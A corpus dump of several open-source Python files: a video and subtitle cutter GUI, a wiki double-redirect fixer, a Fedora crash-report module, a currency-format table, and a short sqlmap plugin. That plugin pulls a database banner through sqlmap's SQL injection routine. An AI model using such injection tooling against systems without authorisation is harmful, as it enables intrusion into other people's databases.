ends_before={'hours': h2, 'minutes': m2, 'seconds': s2})
# d = - duration(dt.time(h1, m1, s1), dt.time(h2, m2, s2)).total_seconds()
print('Shifting {} sliced items'.format(len(part)))
part.shift(hours=-h1, minutes=-m1, seconds=-s1)
part.save(path=sbt_out)
print('Successfully written', sbt_out)
class Main(QtWidgets.QWidget):
def __init__(self):
super(Main, self).__init__()
# File Picker
self.video_pick = Picker('Open video', filters='Videos (*.mp4 *.mpg *.avi);;All files (*.*)')
self.subtitle_pick = Picker('Open subtitle', filters='SubRip Subtitles (*.srt);;All files (*.*)')
self.save_pick = Picker('Save as', check_exists=False, check_writable=True)
# Times
self.start = MinuteSecondEdit(self)
self.stop = MinuteSecondEdit(self)
self.alt_audio = QtWidgets.QCheckBox('Alternate audio track', self)
icon_ok = self.style().standardIcon(QtWidgets.QStyle.SP_DialogOkButton)
self.ok_btn = QPushButton(icon_ok, 'Do it !', self)
self.init()
def init(self):
# events
self.video_pick.textChanged.connect(self.video_changed)
for w in (self.video_pick, self.subtitle_pick, self.start, self.stop, self.save_pick):
w.textChanged.connect(self.doit_controller)
# times
times = QtWidgets.QHBoxLayout()
times.addWidget(self.start)
times.addWidget(self.stop)
times.addStretch(1)
# Buttons
self.ok_btn.setEnabled(False)
self.ok_btn.clicked.connect(self.do_it)
icon_quit = self.style().standardIcon(QtWidgets.QStyle.SP_DialogCancelButton)
quit_btn = QPushButton(icon_quit, 'Quit', self)
quit_btn.clicked.connect(exit)
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(self.alt_audio)
hbox.addStretch(1)
hbox.addWidget(self.ok_btn)
hbox.addWidget(quit_btn)
# Stitch it
# vbox = QtWidgets.QVBoxLayout()
grid = QtWidgets.QGridLayout()
grid.setSpacing(10)
grid.addWidget(QLabel('Video:'), 1, 0)
grid.addWidget(self.video_pick, 1, 1)
grid.addWidget(QLabel('Subtitles:'), 2, 0)
grid.addWidget(self.subtitle_pick, 2, 1)
grid.addWidget(QLabel('Start / Stop (HHMMSS):'), 3, 0)
grid.addLayout(times, 3, 1)
grid.addWidget(QLabel('Output:'), 4, 0)
grid.addWidget(self.save_pick, 4, 1)
# grid.addStretch(1)
grid.addLayout(hbox, 5, 1)
self.setLayout(grid)
# noinspection PyUnusedLocal
@QtCore.pyqtSlot()
def video_changed(self, *args, **kw):
p = self.video_pick.get_text()
if p:
self.subtitle_pick.set_text(str(Path(p).with_suffix('.srt')))
# noinspection PyUnusedLocal
@QtCore.pyqtSlot()
def doit_controller(self, *args, **kw):
ok = lambda w: w.hasAcceptableInput()
self.ok_btn.setEnabled((ok(self.video_pick) or ok(self.subtitle_pick)) and
ok(self.start) and ok(self.stop) and ok(self.save_pick))
def do_it(self):
vid_in = self.video_pick.get_text()
vid_out = self.save_pick.get_text() + os.path.splitext(vid_in)[1]
ss = self.start.get_time()
to = self.stop.get_time()
d = duration_str(self.start.get_h_m_s(), self.stop.get_h_m_s())
alt_audio = self.alt_audio.isChecked()
video_ret = video_cut(vid_in, vid_out, ss, to, d, alt_audio, self)
if video_ret == 0:
sbt_out = self.cut_subtitle()
opn = shutil.which('xdg-open')
if vid_out and os.path.isfile(vid_out):
f = vid_out
elif sbt_out and os.path.isfile(sbt_out):
f = sbt_out
else: # This should not happen as button is greyed out
msg = ''
QMessageBox.warning(self, 'no file was generated', msg, defaultButton=QMessageBox.NoButton)
return
if opn:
subprocess.Popen([opn, f])
def cut_subtitle(self):
sbt_in = self.subtitle_pick.get_text()
if os.path.isfile(sbt_in):
sbt_out = self.save_pick.get_text() + os.path.splitext(sbt_in)[1]
h1, m1, s1 = self.start.get_h_m_s()
h2, m2, s2 = self.stop.get_h_m_s()
import chardet
detected = chardet.detect(open(sbt_in, 'rb').read(1024*1024))
enc = detected['encoding']
cnf = detected['confidence']
e = None
encs = OrderedSet([enc, 'utf-8', 'latin1'])
for encoding in encs:
try:
logger.info('Trying to open subtitle with encoding %s' % encoding)
subs = pysrt.open(sbt_in, error_handling=pysrt.ERROR_LOG, encoding=encoding)
subtitle_cut(h1, m1, s1, h2, m2, s2, subs, sbt_out)
return
except Exception as ae:
e = e or ae
logger.warning('encoding %s failed', encoding, exc_info=1)
msg = "Could not open {} with any of the following encodings:\n {}\n\n" \
"Confidence on {} was {}.\nFirst error was: {}"
msg = msg.format(os.path.basename(sbt_in), ', '.join(encs), enc, cnf, str(e))
QMessageBox.warning(self, 'Opening subtitle failed', msg, defaultButton=QMessageBox.NoButton)
return sbt_out
def main():
app = QtWidgets.QApplication(sys.argv)
# for path in QtGui.QIcon.themeSearchPaths():
# print("%s/%s" % (path, QtGui.QIcon.themeName()))
icon = QtGui.QIcon()
# icon.addPixmap(QtGui.QPixmap(":/icons/hicolor/128x128/apps/quickcut.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
icon.addPixmap(QtGui.QPixmap(ICON), QtGui.QIcon.Normal, QtGui.QIcon.Off)
app.setWindowIcon(icon)
w = Main()
# Set window size.
# screen = QDesktopWidget().screenGeometry()
# w.setGeometry(0, 0, screen.width(), screen.height())
# w.showMaximized()
w.normalGeometry()
# Set window title
w.setWindowTitle("QuickCut")
# Show window
w.show()
sys.exit(app.exec())
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
main()
|
eddy-geek/quickcut
|
quickcut/__init__.py
|
Python
|
gpl-2.0
| 11,720
|
#! /usr/bin/env python3
import logging
import mwparserfromhell
from ws.client import API
from ws.parser_helpers.wikicode import is_redirect
logger = logging.getLogger(__name__)
class DoubleRedirects:
edit_summary = "fix double redirect"
def __init__(self, api):
self.api = api
def update_redirect_page(self, page, target):
title = page["title"]
text_old = page["revisions"][0]["slots"]["main"]["*"]
timestamp = page["revisions"][0]["timestamp"]
if not is_redirect(text_old, full_match=True):
logger.error("Double redirect page '{}' is not empty, so it cannot be fixed automatically.".format(title))
return
logger.info("Parsing '{}'...".format(title))
wikicode = mwparserfromhell.parse(text_old)
# asserted by the regex match above
assert(len(wikicode.nodes) == 3)
assert(isinstance(wikicode.nodes[2], mwparserfromhell.nodes.wikilink.Wikilink))
wl_target = wikicode.nodes[2]
wl_target.title = target
wl_target.text = None
text_new = str(wikicode)
# also add Category:Archive to the redirect
if target.startswith("ArchWiki:Archive"):
text_new = text_new.rstrip() + "\n[[Category:Archive]]"
if text_old != text_new:
self.api.edit(title, page["pageid"], text_new, timestamp, self.edit_summary, bot="")
def findall(self):
double = {}
for source, target in self.api.redirects.map.items():
target = target.split("#", maxsplit=1)[0]
if target in self.api.redirects.map:
double[source] = target
return double
def fixall(self):
double = self.findall()
if not double:
logger.info("There are no double redirects.")
return
# fetch all revisions at once
result = self.api.call_api(action="query", titles="|".join(double.keys()), prop="revisions", rvprop="content|timestamp", rvslots="main")
pages = result["pages"]
for page in pages.values():
source = page["title"]
target = self.api.redirects.resolve(source)
if target:
self.update_redirect_page(page, target)
if __name__ == "__main__":
import ws.config
api = ws.config.object_from_argparser(API, description="Fix double redirects")
dr = DoubleRedirects(api)
dr.fixall()
|
lahwaacz/wiki-scripts
|
fix-double-redirects.py
|
Python
|
gpl-3.0
| 2,435
|
# Copyright (C) 2013 ABRT Team
# Copyright (C) 2013 Red Hat, Inc.
#
# This file is part of faf.
#
# faf is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# faf is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with faf. If not, see <http://www.gnu.org/licenses/>.
from __future__ import absolute_import
from typing import Dict, List, Union
from datetime import datetime
import fnmatch
import json
from urllib.error import HTTPError
from urllib.request import urlopen
import koji
from pyfaf.opsys import System
from pyfaf.checker import DictChecker, IntChecker, ListChecker, StringChecker
from pyfaf.common import FafError, log
from pyfaf.queries import (get_arch_by_name,
get_opsys_by_name,
get_osrelease,
get_package_by_nevra,
get_reportpackage,
get_report_release_desktop,
get_unknown_package)
from pyfaf.storage import (Arch,
Build,
OpSys,
Package,
ReportReleaseDesktop,
ReportPackage,
ReportUnknownPackage,
column_len)
from pyfaf.utils.parse import str2bool, words2list
from pyfaf.storage.custom_types import to_semver
__all__ = ["Fedora"]
class Fedora(System):
name = "fedora"
nice_name = "Fedora"
packages_checker = ListChecker(
DictChecker({
"name": StringChecker(pattern=r"^[a-zA-Z0-9_\-\.\+~]+$",
maxlen=column_len(Package,
"name")),
"epoch": IntChecker(minval=0),
"version": StringChecker(pattern=r"^[a-zA-Z0-9_\.\+~]+$",
maxlen=column_len(Build, "version")),
"release": StringChecker(pattern=r"^[a-zA-Z0-9_\.\+]+$",
maxlen=column_len(Build, "release")),
"architecture": StringChecker(pattern=r"^[a-zA-Z0-9_]+$",
maxlen=column_len(Arch, "name")),
}), minlen=0
)
ureport_checker = DictChecker({
# no need to check name, version and architecture twice
# the toplevel checker already did it
# "name": StringChecker(allowed=[Fedora.name])
# "version": StringChecker()
# "architecture": StringChecker()
"desktop": StringChecker(mandatory=False, pattern=r"^[a-zA-Z0-9_/-]+$",
maxlen=column_len(ReportReleaseDesktop,
"desktop"))
})
pkg_roles = ["affected", "related", "selinux_policy"]
@classmethod
def install(cls, db, logger=None) -> None:
if logger is None:
logger = log.getChild(cls.__name__)
logger.info("Adding Fedora operating system")
new = OpSys()
new.name = cls.nice_name
db.session.add(new)
db.session.flush()
@classmethod
def installed(cls, db) -> bool:
return bool(get_opsys_by_name(db, cls.nice_name))
def __init__(self) -> None:
super().__init__()
self.eol = None
self.pdc_url = None
self.pagure_url = None
self.build_aging_days = None
self.koji_url = None
self.ignored_releases = []
self.allow_unpackaged = None
self.load_config_to_self("eol", ["fedora.supporteol"],
False, callback=str2bool)
self.load_config_to_self("pdc_url", ["fedora.fedorapdc"],
"https://pdc.fedoraproject.org/rest_api/v1/")
self.load_config_to_self("pagure_url", ["fedora.pagureapi"],
"https://src.fedoraproject.org/api/0/")
self.load_config_to_self("build_aging_days",
["fedora.build-aging-days"],
7, callback=int)
self.load_config_to_self("koji_url",
["fedora.koji-url"], None)
self.load_config_to_self("ignored_releases",
["fedora.ignored-releases"], [],
callback=words2list)
self.load_config_to_self("allow_unpackaged",
["ureport.allow-unpackaged"], False,
callback=str2bool)
def _save_packages(self, db, db_report, packages, count=1) -> None:
for package in packages:
role = "RELATED"
if "package_role" in package:
if package["package_role"] == "affected":
role = "CRASHED"
elif package["package_role"] == "selinux_policy":
role = "SELINUX_POLICY"
db_package = get_package_by_nevra(db,
name=package["name"],
epoch=package["epoch"],
version=package["version"],
release=package["release"],
arch=package["architecture"])
if db_package is None:
self.log_warn("Package {0}-{1}:{2}-{3}.{4} not found in "
"storage".format(package["name"],
package["epoch"],
package["version"],
package["release"],
package["architecture"]))
db_unknown_pkg = get_unknown_package(db,
db_report,
role,
package["name"],
package["epoch"],
package["version"],
package["release"],
package["architecture"])
if db_unknown_pkg is None:
db_arch = get_arch_by_name(db, package["architecture"])
if db_arch is None:
continue
db_unknown_pkg = ReportUnknownPackage()
db_unknown_pkg.report = db_report
db_unknown_pkg.name = package["name"]
db_unknown_pkg.epoch = package["epoch"]
db_unknown_pkg.version = package["version"]
db_unknown_pkg.release = package["release"]
db_unknown_pkg.semver = to_semver(package["version"])
db_unknown_pkg.semrel = to_semver(package["release"])
db_unknown_pkg.arch = db_arch
db_unknown_pkg.type = role
db_unknown_pkg.count = 0
db.session.add(db_unknown_pkg)
db_unknown_pkg.count += count
continue
db_reportpackage = get_reportpackage(db, db_report, db_package)
if db_reportpackage is None:
db_reportpackage = ReportPackage()
db_reportpackage.report = db_report
db_reportpackage.installed_package = db_package
db_reportpackage.count = 0
db_reportpackage.type = role
db.session.add(db_reportpackage)
db_reportpackage.count += count
def validate_ureport(self, ureport) -> bool:
Fedora.ureport_checker.check(ureport)
return True
def validate_packages(self, packages) -> bool:
affected = False
Fedora.packages_checker.check(packages)
for package in packages:
if "package_role" in package:
if package["package_role"] not in Fedora.pkg_roles:
raise FafError("Only the following package roles are allowed: "
"{0}".format(", ".join(Fedora.pkg_roles)))
if package["package_role"] == "affected":
affected = True
if not (affected or self.allow_unpackaged):
raise FafError("uReport must contain affected package")
return True
def save_ureport(self, db, db_report, ureport, packages, flush=False, count=1) -> None:
if "desktop" in ureport:
db_release = get_osrelease(db, Fedora.nice_name, ureport["version"])
if db_release is None:
self.log_warn("Release '{0} {1}' not found"
.format(Fedora.nice_name, ureport["version"]))
else:
db_reldesktop = get_report_release_desktop(db, db_report,
db_release,
ureport["desktop"])
if db_reldesktop is None:
db_reldesktop = ReportReleaseDesktop()
db_reldesktop.report = db_report
db_reldesktop.release = db_release
db_reldesktop.desktop = ureport["desktop"]
db_reldesktop.count = 0
db.session.add(db_reldesktop)
db_reldesktop.count += count
self._save_packages(db, db_report, packages, count=count)
if flush:
db.session.flush()
def get_releases(self) -> Dict[str, Dict[str, str]]:
result = {}
# Page size -1 means, that all results are on one page
url = f"{self.pdc_url}releases/?page_size=-1&short={Fedora.name}"
with urlopen(url) as response:
releases = json.load(response)
for release in releases:
ver = release["version"].lower()
# only accept Fedora version with decimals (or rawhide)
if not ver.isdecimal() and ver != "rawhide":
continue
# Only accept GA releases, i.e. skip updates and updates-testing
# pseudo-releases. Moreover check for specifically ignored releases.
if release.get("release_type") != "ga" or self._is_ignored(ver):
continue
result[ver] = {"status": "ACTIVE" if release["active"] else "EOL"}
return result
def get_components(self, release) -> List[str]:
branch = self._release_to_branch(release)
result = []
url = (f"{self.pdc_url}component-branches/?name={branch}&page_size=-1"
"&fields=global_component&type=rpm")
with urlopen(url) as response:
components = json.load(response)
for item in components:
result.append(item["global_component"])
return result
def get_component_acls(self, component) -> Dict[str, Dict[str, bool]]:
result: Dict[str, Dict[str, bool]] = {}
url = f"{self.pagure_url}/rpms/{component}"
try:
with urlopen(url) as response:
acls = json.load(response)
except HTTPError as ex:
self.log_error("Unable to get package information for component '%s': %s\n\tURL: %s",
component, str(ex), url)
return result
for user_g in acls["access_users"]:
for user in acls["access_users"][user_g]:
result[user] = {"commit": True, "watchbugzilla": False}
# Check for watchers
url += "/watchers"
try:
with urlopen(url) as response:
watchers = json.load(response)
except HTTPError as ex:
self.log_error("Unable to get watchers for component '%s': %s\n\tURL: %s",
component, str(ex), url)
return result
for user in watchers["watchers"]:
if user in result.keys():
result[user]["watchbugzilla"] = True
else:
result[user] = {"commit": False, "watchbugzilla": True}
return result
def get_build_candidates(self, db) -> List[Build]:
return (db.session.query(Build)
.filter(Build.release.like("%%.fc%%"))
.all())
def check_pkgname_match(self, packages, parser) -> bool:
for package in packages:
if (not "package_role" in package or
package["package_role"].lower() != "affected"):
continue
nvra = "{0}-{1}-{2}.{3}".format(package["name"],
package["version"],
package["release"],
package["architecture"])
match = parser.match(nvra)
if match is not None:
return True
return False
def _release_to_branch(self, release) -> str:
"""
Convert faf's release to branch name
"""
if not isinstance(release, str):
release = str(release)
if release.lower() == "rawhide":
branch = "rawhide"
elif release.isdigit():
int_release = int(release)
if int_release < 6:
branch = "FC-{0}".format(int_release)
elif int_release == 6:
branch = "fc{0}".format(int_release)
else:
branch = "f{0}".format(int_release)
else:
raise FafError("{0} is not a valid Fedora version".format(release))
return branch
def get_released_builds(self, release) -> List[Dict[str, Union[str, int, datetime]]]:
session = koji.ClientSession(self.koji_url)
builds_release = session.listTagged(tag="f{0}".format(release),
inherit=False)
builds_updates = session.listTagged(tag="f{0}-updates".format(release),
inherit=False)
return [{"name": b["name"],
"epoch": b["epoch"] if b["epoch"] is not None else 0,
"version": b["version"],
"release": b["release"],
"nvr": b["nvr"],
"completion_time": datetime.strptime(b["completion_time"],
"%Y-%m-%d %H:%M:%S.%f")
} for b in sorted(builds_release+builds_updates,
key=lambda b: b["completion_time"],
reverse=True)]
def _is_ignored(self, ver) -> bool:
"""
Check if the release version matches any of the glob-like patterns specified
in the configuration option 'ignored-releases'.
"""
for pattern in self.ignored_releases:
if fnmatch.fnmatchcase(ver, pattern):
return True
return False
|
abrt/faf
|
src/pyfaf/opsys/fedora.py
|
Python
|
gpl-3.0
| 15,625
|
#!/usr/bin/env python
"""
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from plugins.generic.enumeration import Enumeration as GenericEnumeration
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.common import Backend
from lib.core.common import unArrayizeValue
from lib.request import inject
class Enumeration(GenericEnumeration):
def __init__(self):
GenericEnumeration.__init__(self)
def getBanner(self):
if not conf.getBanner:
return
if kb.data.banner is None:
infoMsg = "fetching banner"
logger.info(infoMsg)
query = queries[Backend.getIdentifiedDbms()].banner.query
kb.data.banner = unArrayizeValue(inject.getValue(query, safeCharEncode=True))
return kb.data.banner
|
golismero/golismero
|
tools/sqlmap/plugins/dbms/hsqldb/enumeration.py
|
Python
|
gpl-2.0
| 940
|
# -*- coding: utf-8 -*-
SYMBOL = 'symbol'
POSITIVE_FORMAT = 'positive_format'
NEGATIVE_FORMAT = 'negative_format'
DECIMAL_SYMBOL = 'decimal_symbol'
DIGIT_GROUP_SYMBOL = 'digit_group_symbol'
GROUP_DIGITS = 'group_digits'
CURRENCIES = {
'AED': {
SYMBOL: u'د.إ.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'United Arab Emirates dirham',
'countries': ['United Arab Emirates', 'AE'],
},
'AFN': {
SYMBOL: u'؋',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Afghan afghani',
'countries': ['AF']
},
'ALL': {
SYMBOL: u'Lek',
POSITIVE_FORMAT: u'{value}{symbol}',
NEGATIVE_FORMAT: u'-{value}{symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Albanian lek',
'countries': ['AL']
},
'AMD': {
SYMBOL: u'դր.',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Armenian dram',
'countries': ['AM']
},
'ANG': {
'name': 'Netherlands Antillean guilder',
SYMBOL: u'ƒ',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'countries': ['Curaçao, Sint Maarten']
},
'AOA': {
'name': 'Angolan kwanza',
SYMBOL: u'Kz',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'countries': ['Angola', 'AO']
},
'ARS': {
SYMBOL: u'$',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}-{value}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Argentine peso',
'countries': ['AR']
},
'AUD': {
SYMBOL: u'$',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'-{symbol}{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Australian dollar',
'countries': ['AU']
},
'AWG': {
'name': 'Aruban florin',
SYMBOL: u'ƒ',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'-{symbol}{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'countries': ['Aruba', 'AW']
},
'AZN': {
SYMBOL: u'ман.',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: ' ',
GROUP_DIGITS: True,
'name': 'Azerbaijani manat',
'countries': ['Azerbaijan', 'AZ']
},
'BAM': {
SYMBOL: u'КМ',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Bosnia and Herzegovina convertible mark',
'countries': ['BA', 'HR']
},
'BBD': {
'name': 'Barbados dollar',
SYMBOL: u'Bds$',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'countries': ['Barbados', 'BB']
},
'BDT': {
SYMBOL: u'৳',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol} -{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Bangladeshi taka',
'countries': ['BD']
},
'BGN': {
SYMBOL: u'лв',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: ' ',
GROUP_DIGITS: True,
'name': 'Bulgarian lev',
'countries': ['BG']
},
'BHD': {
SYMBOL: u'د.ب.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Bahraini dinar',
'countries': ['Bahrain', 'BH']
},
'BIF': {
SYMBOL: u'FBu',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Burundian franc',
'countries': ['Burundi', 'BI']
},
'BMD': {
SYMBOL: u'BD$',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Bermudian dollar',
'countries': ['Bermuda', 'BM']
},
'BND': {
SYMBOL: u'$',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'({symbol}{value})',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Brunei dollar',
'countries': ['BN']
},
'BOB': {
SYMBOL: u'$b',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'({symbol} {value})',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Boliviano',
'countries': ['BO']
},
'BOV': {
# SYMBOL: u'$',
'name': 'Bolivian Mvdol (funds code)',
'countries': ['Bolivia', 'BO']
},
'BRL': {
SYMBOL: u'R$',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'-{symbol} {value}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Brazilian real',
'countries': ['BR']
},
'BSD': {
SYMBOL: u'B$',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'-{symbol} {value}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Bahamian dollar',
'countries': ['Bahamas', 'BS']
},
'BTN': {
SYMBOL: u'Nu.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'-{symbol} {value}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Bhutanese ngultrum',
'countries': ['Bhutan', 'BT']
},
'BWP': {
SYMBOL: u'P',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'-{symbol} {value}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Botswana pula',
'countries': ['Botswana', 'BW']
},
'BYR': {
SYMBOL: u'р.',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: ' ',
GROUP_DIGITS: True,
'name': 'Belarusian ruble',
'countries': ['BY']
},
'BZD': {
SYMBOL: u'BZ$',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'({symbol}{value})',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Belize dollar',
'countries': ['BZ']
},
'CAD': {
SYMBOL: u'$',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'-{symbol}{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Canadian dollar',
'countries': ['CA']
},
'CDF': {
SYMBOL: u'FC',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'-{symbol}{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Congolese franc',
'countries': ['Democratic Republic of Congo', 'CD']
},
'CHF': {
SYMBOL: u'SFr.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}-{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: '\'',
GROUP_DIGITS: True,
'name': 'Swiss franc',
'countries': ['CH', 'LI']
},
'CLP': {
SYMBOL: u'$',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'-{symbol} {value}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Chilean peso',
'countries': ['CL']
},
'CNY': {
SYMBOL: u'¥',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'{symbol}-{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Chinese yuan',
'countries': ['CN', 'MN']
},
'COP': {
SYMBOL: u'$',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'({symbol} {value})',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Colombian peso',
'countries': ['CO']
},
'CRC': {
SYMBOL: u'₡',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'({symbol}{value})',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Costa Rican colon',
'countries': ['CR']
},
'CSD': {
SYMBOL: u'Дин.',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Serbian dinar',
'countries': ['CS']
},
'CUC': {
# SYMBOL: u'$',
'name': 'Cuban convertible peso',
'countries': ['Cuba']
},
'CUP': {
SYMBOL: u'₱',
'name': 'Cuban peso',
'countries': ['Cuba']
},
'CVE': {
# SYMBOL: u'$',
'name': 'Cape Verde escudo',
'countries': ['Cape Verde']
},
'CZK': {
SYMBOL: u'Kč',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: ' ',
GROUP_DIGITS: True,
'name': 'Czech koruna',
'countries': ['CZ']
},
'DJF': {
# SYMBOL: u'$',
'name': 'Djiboutian franc',
'countries': ['Djibouti']
},
'DKK': {
SYMBOL: u'kr',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol} -{value}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Danish krone',
'countries': ['DK', 'FO', 'GL']
},
'DOP': {
SYMBOL: u'RD$',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'({symbol}{value})',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Dominican peso',
'countries': ['DO']
},
'DZD': {
SYMBOL: u'د.ج.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Algerian dinar',
'countries': ['DZ'],
},
'EEK': {
SYMBOL: u'kr',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ' ',
GROUP_DIGITS: True,
'name': 'Estonia kroon',
'countries': ['EE']
},
'EGP': {
SYMBOL: u'ج.م.',
